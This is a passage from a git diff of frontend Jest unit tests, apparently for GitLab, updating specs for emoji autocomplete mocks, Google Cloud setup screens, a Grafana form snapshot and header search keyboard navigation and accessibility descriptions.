highlighter } from 'ee_else_ce/gfm_auto_complete'; -import { initEmojiMock } from 'helpers/emoji'; +import { initEmojiMock, clearEmojiMock } from 'helpers/emoji'; import '~/lib/utils/jquery_at_who'; import { TEST_HOST } from 'helpers/test_constants'; import waitForPromises from 'helpers/wait_for_promises'; @@ -803,8 +803,6 @@ describe('GfmAutoComplete', () => { }); describe('emoji', () => { - let mock; - const mockItem = { 'atwho-at': ':', emoji: { @@ -818,14 +816,14 @@ describe('GfmAutoComplete', () => { }; beforeEach(async () => { - mock = await initEmojiMock(); + await initEmojiMock(); 
await new GfmAutoComplete({}).loadEmojiData({ atwho() {}, trigger() {} }, ':'); if (!GfmAutoComplete.glEmojiTag) throw new Error('emoji not loaded'); }); afterEach(() => { - mock.restore(); + clearEmojiMock(); }); describe('Emoji.templateFunction', () => { diff --git a/spec/frontend/google_cloud/components/app_spec.js b/spec/frontend/google_cloud/components/app_spec.js index bb86eb5c22e..570ac1e6ed1 100644 --- a/spec/frontend/google_cloud/components/app_spec.js +++ b/spec/frontend/google_cloud/components/app_spec.js @@ -1,65 +1,71 @@ import { shallowMount } from '@vue/test-utils'; -import { GlTab, GlTabs } from '@gitlab/ui'; +import { mapValues } from 'lodash'; import App from '~/google_cloud/components/app.vue'; +import Home from '~/google_cloud/components/home.vue'; import IncubationBanner from '~/google_cloud/components/incubation_banner.vue'; -import ServiceAccounts from '~/google_cloud/components/service_accounts.vue'; +import ServiceAccountsForm from '~/google_cloud/components/service_accounts_form.vue'; +import GcpError from '~/google_cloud/components/errors/gcp_error.vue'; +import NoGcpProjects from '~/google_cloud/components/errors/no_gcp_projects.vue'; + +const BASE_FEEDBACK_URL = + 'https://gitlab.com/gitlab-org/incubation-engineering/five-minute-production/meta/-/issues/new'; +const SCREEN_COMPONENTS = { + Home, + ServiceAccountsForm, + GcpError, + NoGcpProjects, +}; +const SERVICE_ACCOUNTS_FORM_PROPS = { + gcpProjects: [1, 2, 3], + environments: [4, 5, 6], + cancelPath: '', +}; +const HOME_PROPS = { + serviceAccounts: [{}, {}], + createServiceAccountUrl: '#url-create-service-account', + emptyIllustrationUrl: '#url-empty-illustration', +}; describe('google_cloud App component', () => { let wrapper; const findIncubationBanner = () => wrapper.findComponent(IncubationBanner); - const findTabs = () => wrapper.findComponent(GlTabs); - const findTabItems = () => findTabs().findAllComponents(GlTab); - const findConfigurationTab = () => findTabItems().at(0); - 
const findDeploymentTab = () => findTabItems().at(1); - const findServicesTab = () => findTabItems().at(2); - const findServiceAccounts = () => findConfigurationTab().findComponent(ServiceAccounts); - - beforeEach(() => { - const propsData = { - serviceAccounts: [{}, {}], - createServiceAccountUrl: '#url-create-service-account', - emptyIllustrationUrl: '#url-empty-illustration', - }; - wrapper = shallowMount(App, { propsData }); - }); afterEach(() => { wrapper.destroy(); }); - it('should contain incubation banner', () => { - expect(findIncubationBanner().exists()).toBe(true); - }); - - describe('google_cloud App tabs', () => { - it('should contain tabs', () => { - expect(findTabs().exists()).toBe(true); - }); + describe.each` + screen | extraProps | componentName + ${'gcp_error'} | ${{ error: 'mock_gcp_client_error' }} | ${'GcpError'} + ${'no_gcp_projects'} | ${{}} | ${'NoGcpProjects'} + ${'service_accounts_form'} | ${SERVICE_ACCOUNTS_FORM_PROPS} | ${'ServiceAccountsForm'} + ${'home'} | ${HOME_PROPS} | ${'Home'} + `('for screen=$screen', ({ screen, extraProps, componentName }) => { + const component = SCREEN_COMPONENTS[componentName]; - it('should contain three tab items', () => { - expect(findTabItems().length).toBe(3); + beforeEach(() => { + wrapper = shallowMount(App, { propsData: { screen, ...extraProps } }); }); - describe('configuration tab', () => { - it('should exist', () => { - expect(findConfigurationTab().exists()).toBe(true); - }); + it(`renders only ${componentName}`, () => { + const existences = mapValues(SCREEN_COMPONENTS, (x) => wrapper.findComponent(x).exists()); - it('should contain service accounts component', () => { - expect(findServiceAccounts().exists()).toBe(true); + expect(existences).toEqual({ + ...mapValues(SCREEN_COMPONENTS, () => false), + [componentName]: true, }); }); - describe('deployments tab', () => { - it('should exist', () => { - expect(findDeploymentTab().exists()).toBe(true); - }); + it(`renders the ${componentName} with 
props`, () => { + expect(wrapper.findComponent(component).props()).toEqual(extraProps); }); - describe('services tab', () => { - it('should exist', () => { - expect(findServicesTab().exists()).toBe(true); + it('renders incubation banner', () => { + expect(findIncubationBanner().props()).toEqual({ + shareFeedbackUrl: `${BASE_FEEDBACK_URL}?issuable_template=general_feedback`, + reportBugUrl: `${BASE_FEEDBACK_URL}?issuable_template=report_bug`, + featureRequestUrl: `${BASE_FEEDBACK_URL}?issuable_template=feature_request`, }); }); }); diff --git a/spec/frontend/google_cloud/components/errors/gcp_error_spec.js b/spec/frontend/google_cloud/components/errors/gcp_error_spec.js new file mode 100644 index 00000000000..4062a8b902a --- /dev/null +++ b/spec/frontend/google_cloud/components/errors/gcp_error_spec.js @@ -0,0 +1,34 @@ +import { shallowMount } from '@vue/test-utils'; +import { GlAlert } from '@gitlab/ui'; +import GcpError from '~/google_cloud/components/errors/gcp_error.vue'; + +describe('GcpError component', () => { + let wrapper; + + const findAlert = () => wrapper.findComponent(GlAlert); + const findBlockquote = () => wrapper.find('blockquote'); + + const propsData = { error: 'IAM and CloudResourceManager API disabled' }; + + beforeEach(() => { + wrapper = shallowMount(GcpError, { propsData }); + }); + + afterEach(() => { + wrapper.destroy(); + }); + + it('contains alert', () => { + expect(findAlert().exists()).toBe(true); + }); + + it('contains relevant text', () => { + const alertText = findAlert().text(); + expect(findAlert().props('title')).toBe(GcpError.i18n.title); + expect(alertText).toContain(GcpError.i18n.description); + }); + + it('contains error stacktrace', () => { + expect(findBlockquote().text()).toBe(propsData.error); + }); +}); diff --git a/spec/frontend/google_cloud/components/errors/no_gcp_projects_spec.js b/spec/frontend/google_cloud/components/errors/no_gcp_projects_spec.js new file mode 100644 index 00000000000..e1e20377880 --- /dev/null +++ 
b/spec/frontend/google_cloud/components/errors/no_gcp_projects_spec.js @@ -0,0 +1,33 @@ +import { mount } from '@vue/test-utils'; +import { GlAlert, GlButton } from '@gitlab/ui'; +import NoGcpProjects from '~/google_cloud/components/errors/no_gcp_projects.vue'; + +describe('NoGcpProjects component', () => { + let wrapper; + + const findAlert = () => wrapper.findComponent(GlAlert); + const findButton = () => wrapper.findComponent(GlButton); + + beforeEach(() => { + wrapper = mount(NoGcpProjects); + }); + + afterEach(() => { + wrapper.destroy(); + }); + + it('contains alert', () => { + expect(findAlert().exists()).toBe(true); + }); + + it('contains relevant text', () => { + expect(findAlert().props('title')).toBe(NoGcpProjects.i18n.title); + expect(findAlert().text()).toContain(NoGcpProjects.i18n.description); + }); + + it('contains create gcp project button', () => { + const button = findButton(); + expect(button.text()).toBe(NoGcpProjects.i18n.createLabel); + expect(button.attributes('href')).toBe('https://console.cloud.google.com/projectcreate'); + }); +}); diff --git a/spec/frontend/google_cloud/components/home_spec.js b/spec/frontend/google_cloud/components/home_spec.js new file mode 100644 index 00000000000..9b4c3a79f11 --- /dev/null +++ b/spec/frontend/google_cloud/components/home_spec.js @@ -0,0 +1,61 @@ +import { shallowMount } from '@vue/test-utils'; +import { GlTab, GlTabs } from '@gitlab/ui'; +import Home from '~/google_cloud/components/home.vue'; +import ServiceAccountsList from '~/google_cloud/components/service_accounts_list.vue'; + +describe('google_cloud Home component', () => { + let wrapper; + + const findTabs = () => wrapper.findComponent(GlTabs); + const findTabItems = () => findTabs().findAllComponents(GlTab); + const findTabItemsModel = () => + findTabs() + .findAllComponents(GlTab) + .wrappers.map((x) => ({ + title: x.attributes('title'), + disabled: x.attributes('disabled'), + })); + + const TEST_HOME_PROPS = { + serviceAccounts: [{}, {}], + 
createServiceAccountUrl: '#url-create-service-account', + emptyIllustrationUrl: '#url-empty-illustration', + }; + + beforeEach(() => { + const propsData = { + screen: 'home', + ...TEST_HOME_PROPS, + }; + wrapper = shallowMount(Home, { propsData }); + }); + + afterEach(() => { + wrapper.destroy(); + }); + + describe('google_cloud App tabs', () => { + it('should contain tabs', () => { + expect(findTabs().exists()).toBe(true); + }); + + it('should contain three tab items', () => { + expect(findTabItemsModel()).toEqual([ + { title: 'Configuration', disabled: undefined }, + { title: 'Deployments', disabled: '' }, + { title: 'Services', disabled: '' }, + ]); + }); + + describe('configuration tab', () => { + it('should contain service accounts component', () => { + const serviceAccounts = findTabItems().at(0).findComponent(ServiceAccountsList); + expect(serviceAccounts.props()).toEqual({ + list: TEST_HOME_PROPS.serviceAccounts, + createUrl: TEST_HOME_PROPS.createServiceAccountUrl, + emptyIllustrationUrl: TEST_HOME_PROPS.emptyIllustrationUrl, + }); + }); + }); + }); +}); diff --git a/spec/frontend/google_cloud/components/service_accounts_form_spec.js b/spec/frontend/google_cloud/components/service_accounts_form_spec.js new file mode 100644 index 00000000000..5394d0cdaef --- /dev/null +++ b/spec/frontend/google_cloud/components/service_accounts_form_spec.js @@ -0,0 +1,59 @@ +import { shallowMount } from '@vue/test-utils'; +import { GlButton, GlFormGroup, GlFormSelect } from '@gitlab/ui'; +import ServiceAccountsForm from '~/google_cloud/components/service_accounts_form.vue'; + +describe('ServiceAccountsForm component', () => { + let wrapper; + + const findHeader = () => wrapper.find('header'); + const findAllFormGroups = () => wrapper.findAllComponents(GlFormGroup); + const findAllFormSelects = () => wrapper.findAllComponents(GlFormSelect); + const findAllButtons = () => wrapper.findAllComponents(GlButton); + + const propsData = { gcpProjects: [], environments: [], 
cancelPath: '#cancel-url' }; + + beforeEach(() => { + wrapper = shallowMount(ServiceAccountsForm, { propsData }); + }); + + afterEach(() => { + wrapper.destroy(); + }); + + it('contains header', () => { + expect(findHeader().exists()).toBe(true); + }); + + it('contains GCP project form group', () => { + const formGroup = findAllFormGroups().at(0); + expect(formGroup.exists()).toBe(true); + }); + + it('contains GCP project dropdown', () => { + const select = findAllFormSelects().at(0); + expect(select.exists()).toBe(true); + }); + + it('contains Environments form group', () => { + const formGorup = findAllFormGroups().at(1); + expect(formGorup.exists()).toBe(true); + }); + + it('contains Environments dropdown', () => { + const select = findAllFormSelects().at(1); + expect(select.exists()).toBe(true); + }); + + it('contains Submit button', () => { + const button = findAllButtons().at(0); + expect(button.exists()).toBe(true); + expect(button.text()).toBe(ServiceAccountsForm.i18n.submitLabel); + }); + + it('contains Cancel button', () => { + const button = findAllButtons().at(1); + expect(button.exists()).toBe(true); + expect(button.text()).toBe(ServiceAccountsForm.i18n.cancelLabel); + expect(button.attributes('href')).toBe('#cancel-url'); + }); +}); diff --git a/spec/frontend/google_cloud/components/service_accounts_spec.js b/spec/frontend/google_cloud/components/service_accounts_list_spec.js index 3d097078f03..cdb3f74051c 100644 --- a/spec/frontend/google_cloud/components/service_accounts_spec.js +++ b/spec/frontend/google_cloud/components/service_accounts_list_spec.js @@ -1,6 +1,6 @@ import { mount } from '@vue/test-utils'; import { GlButton, GlEmptyState, GlTable } from '@gitlab/ui'; -import ServiceAccounts from '~/google_cloud/components/service_accounts.vue'; +import ServiceAccountsList from '~/google_cloud/components/service_accounts_list.vue'; describe('ServiceAccounts component', () => { describe('when the project does not have any service accounts', () => { 
@@ -15,7 +15,7 @@ describe('ServiceAccounts component', () => { createUrl: '#create-url', emptyIllustrationUrl: '#empty-illustration-url', }; - wrapper = mount(ServiceAccounts, { propsData }); + wrapper = mount(ServiceAccountsList, { propsData }); }); afterEach(() => { @@ -48,7 +48,7 @@ describe('ServiceAccounts component', () => { createUrl: '#create-url', emptyIllustrationUrl: '#empty-illustration-url', }; - wrapper = mount(ServiceAccounts, { propsData }); + wrapper = mount(ServiceAccountsList, { propsData }); }); it('shows the title', () => { diff --git a/spec/frontend/grafana_integration/components/__snapshots__/grafana_integration_spec.js.snap b/spec/frontend/grafana_integration/components/__snapshots__/grafana_integration_spec.js.snap index 33e2c0db5e5..9447e7daba8 100644 --- a/spec/frontend/grafana_integration/components/__snapshots__/grafana_integration_spec.js.snap +++ b/spec/frontend/grafana_integration/components/__snapshots__/grafana_integration_spec.js.snap @@ -47,6 +47,7 @@ exports[`grafana integration component default state to match the default snapsh label="Enable authentication" label-for="grafana-integration-enabled" labeldescription="" + optionaltext="(optional)" > <gl-form-checkbox-stub id="grafana-integration-enabled" @@ -62,6 +63,7 @@ exports[`grafana integration component default state to match the default snapsh label="Grafana URL" label-for="grafana-url" labeldescription="" + optionaltext="(optional)" > <gl-form-input-stub id="grafana-url" @@ -74,6 +76,7 @@ exports[`grafana integration component default state to match the default snapsh label="API token" label-for="grafana-token" labeldescription="" + optionaltext="(optional)" > <gl-form-input-stub id="grafana-token" diff --git a/spec/frontend/header_search/components/app_spec.js b/spec/frontend/header_search/components/app_spec.js index 2ea2693a978..3200c6614f1 100644 --- a/spec/frontend/header_search/components/app_spec.js +++ b/spec/frontend/header_search/components/app_spec.js @@ -6,9 
+6,17 @@ import HeaderSearchApp from '~/header_search/components/app.vue'; import HeaderSearchAutocompleteItems from '~/header_search/components/header_search_autocomplete_items.vue'; import HeaderSearchDefaultItems from '~/header_search/components/header_search_default_items.vue'; import HeaderSearchScopedItems from '~/header_search/components/header_search_scoped_items.vue'; -import { ENTER_KEY, ESC_KEY } from '~/lib/utils/keys'; +import { SEARCH_INPUT_DESCRIPTION, SEARCH_RESULTS_DESCRIPTION } from '~/header_search/constants'; +import DropdownKeyboardNavigation from '~/vue_shared/components/dropdown_keyboard_navigation.vue'; +import { ENTER_KEY } from '~/lib/utils/keys'; import { visitUrl } from '~/lib/utils/url_utility'; -import { MOCK_SEARCH, MOCK_SEARCH_QUERY, MOCK_USERNAME } from '../mock_data'; +import { + MOCK_SEARCH, + MOCK_SEARCH_QUERY, + MOCK_USERNAME, + MOCK_DEFAULT_SEARCH_OPTIONS, + MOCK_SCOPED_SEARCH_OPTIONS, +} from '../mock_data'; Vue.use(Vuex); @@ -22,9 +30,10 @@ describe('HeaderSearchApp', () => { const actionSpies = { setSearch: jest.fn(), fetchAutocompleteOptions: jest.fn(), + clearAutocomplete: jest.fn(), }; - const createComponent = (initialState) => { + const createComponent = (initialState, mockGetters) => { const store = new Vuex.Store({ state: { ...initialState, @@ -32,6 +41,8 @@ describe('HeaderSearchApp', () => { actions: actionSpies, getters: { searchQuery: () => MOCK_SEARCH_QUERY, + searchOptions: () => MOCK_DEFAULT_SEARCH_OPTIONS, + ...mockGetters, }, }); @@ -50,11 +61,27 @@ describe('HeaderSearchApp', () => { const findHeaderSearchScopedItems = () => wrapper.findComponent(HeaderSearchScopedItems); const findHeaderSearchAutocompleteItems = () => wrapper.findComponent(HeaderSearchAutocompleteItems); + const findDropdownKeyboardNavigation = () => wrapper.findComponent(DropdownKeyboardNavigation); + const findSearchInputDescription = () => wrapper.find(`#${SEARCH_INPUT_DESCRIPTION}`); + const findSearchResultsDescription = () => 
wrapper.findByTestId(SEARCH_RESULTS_DESCRIPTION); describe('template', () => { - it('always renders Header Search Input', () => { - createComponent(); - expect(findHeaderSearchInput().exists()).toBe(true); + describe('always renders', () => { + beforeEach(() => { + createComponent(); + }); + + it('Header Search Input', () => { + expect(findHeaderSearchInput().exists()).toBe(true); + }); + + it('Search Input Description', () => { + expect(findSearchInputDescription().exists()).toBe(true); + }); + + it('Search Results Description', () => { + expect(findSearchResultsDescription().exists()).toBe(true); + }); }); describe.each` @@ -66,9 +93,9 @@ describe('HeaderSearchApp', () => { `('Header Search Dropdown', ({ showDropdown, username, showSearchDropdown }) => { describe(`when showDropdown is ${showDropdown} and current_username is ${username}`, () => { beforeEach(() => { - createComponent(); window.gon.current_username = username; - wrapper.setData({ showDropdown }); + createComponent(); + findHeaderSearchInput().vm.$emit(showDropdown ? 'click' : ''); }); it(`should${showSearchDropdown ? '' : ' not'} render`, () => { @@ -78,31 +105,89 @@ describe('HeaderSearchApp', () => { }); describe.each` - search | showDefault | showScoped | showAutocomplete - ${null} | ${true} | ${false} | ${false} - ${''} | ${true} | ${false} | ${false} - ${MOCK_SEARCH} | ${false} | ${true} | ${true} - `('Header Search Dropdown Items', ({ search, showDefault, showScoped, showAutocomplete }) => { - describe(`when search is ${search}`, () => { - beforeEach(() => { - createComponent({ search }); - window.gon.current_username = MOCK_USERNAME; - wrapper.setData({ showDropdown: true }); - }); - - it(`should${showDefault ? 
'' : ' not'} render the Default Dropdown Items`, () => { - expect(findHeaderSearchDefaultItems().exists()).toBe(showDefault); + search | showDefault | showScoped | showAutocomplete | showDropdownNavigation + ${null} | ${true} | ${false} | ${false} | ${true} + ${''} | ${true} | ${false} | ${false} | ${true} + ${MOCK_SEARCH} | ${false} | ${true} | ${true} | ${true} + `( + 'Header Search Dropdown Items', + ({ search, showDefault, showScoped, showAutocomplete, showDropdownNavigation }) => { + describe(`when search is ${search}`, () => { + beforeEach(() => { + window.gon.current_username = MOCK_USERNAME; + createComponent({ search }); + findHeaderSearchInput().vm.$emit('click'); + }); + + it(`should${showDefault ? '' : ' not'} render the Default Dropdown Items`, () => { + expect(findHeaderSearchDefaultItems().exists()).toBe(showDefault); + }); + + it(`should${showScoped ? '' : ' not'} render the Scoped Dropdown Items`, () => { + expect(findHeaderSearchScopedItems().exists()).toBe(showScoped); + }); + + it(`should${ + showAutocomplete ? '' : ' not' + } render the Autocomplete Dropdown Items`, () => { + expect(findHeaderSearchAutocompleteItems().exists()).toBe(showAutocomplete); + }); + + it(`should${ + showDropdownNavigation ? '' : ' not' + } render the Dropdown Navigation Component`, () => { + expect(findDropdownKeyboardNavigation().exists()).toBe(showDropdownNavigation); + }); }); + }, + ); - it(`should${showScoped ? 
'' : ' not'} render the Scoped Dropdown Items`, () => { - expect(findHeaderSearchScopedItems().exists()).toBe(showScoped); + describe.each` + username | showDropdown | expectedDesc + ${null} | ${false} | ${HeaderSearchApp.i18n.searchInputDescribeByNoDropdown} + ${null} | ${true} | ${HeaderSearchApp.i18n.searchInputDescribeByNoDropdown} + ${MOCK_USERNAME} | ${false} | ${HeaderSearchApp.i18n.searchInputDescribeByWithDropdown} + ${MOCK_USERNAME} | ${true} | ${HeaderSearchApp.i18n.searchInputDescribeByWithDropdown} + `('Search Input Description', ({ username, showDropdown, expectedDesc }) => { + describe(`current_username is ${username} and showDropdown is ${showDropdown}`, () => { + beforeEach(() => { + window.gon.current_username = username; + createComponent(); + findHeaderSearchInput().vm.$emit(showDropdown ? 'click' : ''); }); - it(`should${showAutocomplete ? '' : ' not'} render the Autocomplete Dropdown Items`, () => { - expect(findHeaderSearchAutocompleteItems().exists()).toBe(showAutocomplete); + it(`sets description to ${expectedDesc}`, () => { + expect(findSearchInputDescription().text()).toBe(expectedDesc); }); }); }); + + describe.each` + username | showDropdown | search | loading | searchOptions | expectedDesc + ${null} | ${true} | ${''} | ${false} | ${[]} | ${''} + ${MOCK_USERNAME} | ${false} | ${''} | ${false} | ${[]} | ${''} + ${MOCK_USERNAME} | ${true} | ${''} | ${false} | ${MOCK_DEFAULT_SEARCH_OPTIONS} | ${`${MOCK_DEFAULT_SEARCH_OPTIONS.length} default results provided. Use the up and down arrow keys to navigate search results list.`} + ${MOCK_USERNAME} | ${true} | ${''} | ${true} | ${MOCK_DEFAULT_SEARCH_OPTIONS} | ${`${MOCK_DEFAULT_SEARCH_OPTIONS.length} default results provided. Use the up and down arrow keys to navigate search results list.`} + ${MOCK_USERNAME} | ${true} | ${MOCK_SEARCH} | ${false} | ${MOCK_SCOPED_SEARCH_OPTIONS} | ${`Results updated. ${MOCK_SCOPED_SEARCH_OPTIONS.length} results available. 
Use the up and down arrow keys to navigate search results list, or ENTER to submit.`} + ${MOCK_USERNAME} | ${true} | ${MOCK_SEARCH} | ${true} | ${MOCK_SCOPED_SEARCH_OPTIONS} | ${HeaderSearchApp.i18n.searchResultsLoading} + `( + 'Search Results Description', + ({ username, showDropdown, search, loading, searchOptions, expectedDesc }) => { + describe(`search is ${search}, loading is ${loading}, and showSearchDropdown is ${ + Boolean(username) && showDropdown + }`, () => { + beforeEach(() => { + window.gon.current_username = username; + createComponent({ search, loading }, { searchOptions: () => searchOptions }); + findHeaderSearchInput().vm.$emit(showDropdown ? 'click' : ''); + }); + + it(`sets description to ${expectedDesc}`, () => { + expect(findSearchResultsDescription().text()).toBe(expectedDesc); + }); + }); + }, + ); }); describe('events', () => { @@ -132,36 +217,86 @@ describe('HeaderSearchApp', () => { }); }); - describe('when dropdown is opened', () => { - beforeEach(() => { - wrapper.setData({ showDropdown: true }); + describe('onInput', () => { + describe('when search has text', () => { + beforeEach(() => { + findHeaderSearchInput().vm.$emit('input', MOCK_SEARCH); + }); + + it('calls setSearch with search term', () => { + expect(actionSpies.setSearch).toHaveBeenCalledWith(expect.any(Object), MOCK_SEARCH); + }); + + it('calls fetchAutocompleteOptions', () => { + expect(actionSpies.fetchAutocompleteOptions).toHaveBeenCalled(); + }); + + it('does not call clearAutocomplete', () => { + expect(actionSpies.clearAutocomplete).not.toHaveBeenCalled(); + }); }); - it('onKey-Escape closes dropdown', async () => { - expect(findHeaderSearchDropdown().exists()).toBe(true); - findHeaderSearchInput().vm.$emit('keydown', new KeyboardEvent({ key: ESC_KEY })); + describe('when search is emptied', () => { + beforeEach(() => { + findHeaderSearchInput().vm.$emit('input', ''); + }); - await wrapper.vm.$nextTick(); + it('calls setSearch with empty term', () => { + 
expect(actionSpies.setSearch).toHaveBeenCalledWith(expect.any(Object), ''); + }); - expect(findHeaderSearchDropdown().exists()).toBe(false); + it('does not call fetchAutocompleteOptions', () => { + expect(actionSpies.fetchAutocompleteOptions).not.toHaveBeenCalled(); + }); + + it('calls clearAutocomplete', () => { + expect(actionSpies.clearAutocomplete).toHaveBeenCalled(); + }); }); }); + }); - describe('onInput', () => { - beforeEach(() => { - findHeaderSearchInput().vm.$emit('input', MOCK_SEARCH); - }); + describe('Dropdown Keyboard Navigation', () => { + beforeEach(() => { + findHeaderSearchInput().vm.$emit('click'); + }); - it('calls setSearch with search term', () => { - expect(actionSpies.setSearch).toHaveBeenCalledWith(expect.any(Object), MOCK_SEARCH); - }); + it('closes dropdown when @tab is emitted', async () => { + expect(findHeaderSearchDropdown().exists()).toBe(true); + findDropdownKeyboardNavigation().vm.$emit('tab'); - it('calls fetchAutocompleteOptions', () => { - expect(actionSpies.fetchAutocompleteOptions).toHaveBeenCalled(); - }); + await wrapper.vm.$nextTick(); + + expect(findHeaderSearchDropdown().exists()).toBe(false); + }); + }); + }); + + describe('computed', () => { + describe('currentFocusedOption', () => { + const MOCK_INDEX = 1; + + beforeEach(() => { + createComponent(); + window.gon.current_username = MOCK_USERNAME; + findHeaderSearchInput().vm.$emit('click'); + }); + + it(`when currentFocusIndex changes to ${MOCK_INDEX} updates the data to searchOptions[${MOCK_INDEX}]`, async () => { + findDropdownKeyboardNavigation().vm.$emit('change', MOCK_INDEX); + await wrapper.vm.$nextTick(); + expect(wrapper.vm.currentFocusedOption).toBe(MOCK_DEFAULT_SEARCH_OPTIONS[MOCK_INDEX]); }); + }); + }); - it('submits a search onKey-Enter', async () => { + describe('Submitting a search', () => { + describe('with no currentFocusedOption', () => { + beforeEach(() => { + createComponent(); + }); + + it('onKey-enter submits a search', async () => { 
findHeaderSearchInput().vm.$emit('keydown', new KeyboardEvent({ key: ENTER_KEY })); await wrapper.vm.$nextTick(); @@ -169,5 +304,22 @@ describe('HeaderSearchApp', () => { expect(visitUrl).toHaveBeenCalledWith(MOCK_SEARCH_QUERY); }); }); + + describe('with currentFocusedOption', () => { + const MOCK_INDEX = 1; + + beforeEach(() => { + createComponent(); + window.gon.current_username = MOCK_USERNAME; + findHeaderSearchInput().vm.$emit('click'); + }); + + it('onKey-enter clicks the selected dropdown item rather than submitting a search', async () => { + findDropdownKeyboardNavigation().vm.$emit('change', MOCK_INDEX); + await wrapper.vm.$nextTick(); + findHeaderSearchInput().vm.$emit('keydown', new KeyboardEvent({ key: ENTER_KEY })); + expect(visitUrl).toHaveBeenCalledWith(MOCK_DEFAULT_SEARCH_OPTIONS[MOCK_INDEX].url); + }); + }); }); }); diff --git a/spec/frontend/header_search/components/header_search_autocomplete_items_spec.js b/spec/frontend/header_search/components/header_search_autocomplete_items_spec.js index 6b84e63989d..bec0cbc8a5c 100644 --- a/spec/frontend/header_search/components/header_search_autocomplete_items_spec.js +++ b/spec/frontend/header_search/components/header_search_autocomplete_items_spec.js @@ -9,14 +9,14 @@ import { PROJECTS_CATEGORY, SMALL_AVATAR_PX, } from '~/header_search/constants'; -import { MOCK_GROUPED_AUTOCOMPLETE_OPTIONS, MOCK_AUTOCOMPLETE_OPTIONS } from '../mock_data'; +import { MOCK_GROUPED_AUTOCOMPLETE_OPTIONS, MOCK_SORTED_AUTOCOMPLETE_OPTIONS } from '../mock_data'; Vue.use(Vuex); describe('HeaderSearchAutocompleteItems', () => { let wrapper; - const createComponent = (initialState, mockGetters) => { + const createComponent = (initialState, mockGetters, props) => { const store = new Vuex.Store({ state: { loading: false, @@ -30,6 +30,9 @@ describe('HeaderSearchAutocompleteItems', () => { wrapper = shallowMount(HeaderSearchAutocompleteItems, { store, + propsData: { + ...props, + }, }); }; @@ -38,6 +41,7 @@ 
describe('HeaderSearchAutocompleteItems', () => { }); const findDropdownItems = () => wrapper.findAllComponents(GlDropdownItem); + const findFirstDropdownItem = () => findDropdownItems().at(0); const findDropdownItemTitles = () => findDropdownItems().wrappers.map((w) => w.text()); const findDropdownItemLinks = () => findDropdownItems().wrappers.map((w) => w.attributes('href')); const findGlLoadingIcon = () => wrapper.findComponent(GlLoadingIcon); @@ -69,16 +73,16 @@ describe('HeaderSearchAutocompleteItems', () => { describe('Dropdown items', () => { it('renders item for each option in autocomplete option', () => { - expect(findDropdownItems()).toHaveLength(MOCK_AUTOCOMPLETE_OPTIONS.length); + expect(findDropdownItems()).toHaveLength(MOCK_SORTED_AUTOCOMPLETE_OPTIONS.length); }); it('renders titles correctly', () => { - const expectedTitles = MOCK_AUTOCOMPLETE_OPTIONS.map((o) => o.label); + const expectedTitles = MOCK_SORTED_AUTOCOMPLETE_OPTIONS.map((o) => o.label); expect(findDropdownItemTitles()).toStrictEqual(expectedTitles); }); it('renders links correctly', () => { - const expectedLinks = MOCK_AUTOCOMPLETE_OPTIONS.map((o) => o.url); + const expectedLinks = MOCK_SORTED_AUTOCOMPLETE_OPTIONS.map((o) => o.url); expect(findDropdownItemLinks()).toStrictEqual(expectedLinks); }); }); @@ -104,5 +108,46 @@ describe('HeaderSearchAutocompleteItems', () => { }); }); }); + + describe.each` + currentFocusedOption | isFocused | ariaSelected + ${null} | ${false} | ${undefined} + ${{ html_id: 'not-a-match' }} | ${false} | ${undefined} + ${MOCK_SORTED_AUTOCOMPLETE_OPTIONS[0]} | ${true} | ${'true'} + `('isOptionFocused', ({ currentFocusedOption, isFocused, ariaSelected }) => { + describe(`when currentFocusedOption.html_id is ${currentFocusedOption?.html_id}`, () => { + beforeEach(() => { + createComponent({}, {}, { currentFocusedOption }); + }); + + it(`should${isFocused ? 
'' : ' not'} have gl-bg-gray-50 applied`, () => { + expect(findFirstDropdownItem().classes('gl-bg-gray-50')).toBe(isFocused); + }); + + it(`sets "aria-selected to ${ariaSelected}`, () => { + expect(findFirstDropdownItem().attributes('aria-selected')).toBe(ariaSelected); + }); + }); + }); + }); + + describe('watchers', () => { + describe('currentFocusedOption', () => { + beforeEach(() => { + createComponent(); + }); + + it('when focused changes to existing element calls scroll into view on the newly focused element', async () => { + const focusedElement = findFirstDropdownItem().element; + const scrollSpy = jest.spyOn(focusedElement, 'scrollIntoView'); + + wrapper.setProps({ currentFocusedOption: MOCK_SORTED_AUTOCOMPLETE_OPTIONS[0] }); + + await wrapper.vm.$nextTick(); + + expect(scrollSpy).toHaveBeenCalledWith(false); + scrollSpy.mockRestore(); + }); + }); }); }); diff --git a/spec/frontend/header_search/components/header_search_default_items_spec.js b/spec/frontend/header_search/components/header_search_default_items_spec.js index ce083d0df72..abcacc487df 100644 --- a/spec/frontend/header_search/components/header_search_default_items_spec.js +++ b/spec/frontend/header_search/components/header_search_default_items_spec.js @@ -10,7 +10,7 @@ Vue.use(Vuex); describe('HeaderSearchDefaultItems', () => { let wrapper; - const createComponent = (initialState) => { + const createComponent = (initialState, props) => { const store = new Vuex.Store({ state: { searchContext: MOCK_SEARCH_CONTEXT, @@ -23,6 +23,9 @@ describe('HeaderSearchDefaultItems', () => { wrapper = shallowMount(HeaderSearchDefaultItems, { store, + propsData: { + ...props, + }, }); }; @@ -32,6 +35,7 @@ describe('HeaderSearchDefaultItems', () => { const findDropdownHeader = () => wrapper.findComponent(GlDropdownSectionHeader); const findDropdownItems = () => wrapper.findAllComponents(GlDropdownItem); + const findFirstDropdownItem = () => findDropdownItems().at(0); const findDropdownItemTitles = () => 
findDropdownItems().wrappers.map((w) => w.text()); const findDropdownItemLinks = () => findDropdownItems().wrappers.map((w) => w.attributes('href')); @@ -77,5 +81,26 @@ describe('HeaderSearchDefaultItems', () => { }); }); }); + + describe.each` + currentFocusedOption | isFocused | ariaSelected + ${null} | ${false} | ${undefined} + ${{ html_id: 'not-a-match' }} | ${false} | ${undefined} + ${MOCK_DEFAULT_SEARCH_OPTIONS[0]} | ${true} | ${'true'} + `('isOptionFocused', ({ currentFocusedOption, isFocused, ariaSelected }) => { + describe(`when currentFocusedOption.html_id is ${currentFocusedOption?.html_id}`, () => { + beforeEach(() => { + createComponent({}, { currentFocusedOption }); + }); + + it(`should${isFocused ? '' : ' not'} have gl-bg-gray-50 applied`, () => { + expect(findFirstDropdownItem().classes('gl-bg-gray-50')).toBe(isFocused); + }); + + it(`sets "aria-selected to ${ariaSelected}`, () => { + expect(findFirstDropdownItem().attributes('aria-selected')).toBe(ariaSelected); + }); + }); + }); }); }); diff --git a/spec/frontend/header_search/components/header_search_scoped_items_spec.js b/spec/frontend/header_search/components/header_search_scoped_items_spec.js index 